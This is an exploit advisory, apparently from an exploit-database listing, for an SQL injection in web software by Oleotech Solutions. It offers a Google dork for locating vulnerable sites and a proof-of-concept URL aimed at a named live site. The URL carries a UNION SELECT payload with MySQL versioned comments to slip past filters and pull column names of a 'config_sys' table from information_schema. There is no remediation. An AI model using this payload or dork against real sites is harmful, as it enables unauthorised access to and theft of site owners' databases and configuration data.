#Exploit Title: Oleotech Solutions– SQL Injection vulnerability
#Date: 2020-08-16
#Exploit Author: Mostafa Farzaneh
#Vendor Homepage: www.oleotechsolutions.com
#Google Dork: " Developed by Oleotech Solutions”
#Category: webapps
#Tested On: windows 10, Firefox
#Software Link: www.oleotechsolutions.com/work.php
#Proof of Concept:
Demo: https://rotary3211.org/rotary-member-rotarydetails.php?idno=89001&cid=%27%20/*!12345UNION*/%20SELECT%201,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37%20/*!12345from*/%20%20/*!23455information_schema.columns*/%20where%20table_name=%27config_sys%27--%20-
*********************************************************
#Discovered by: Mostafa Farzaneh from PywebSecurity team
#Telegram: @pyweb_security
*********************************************************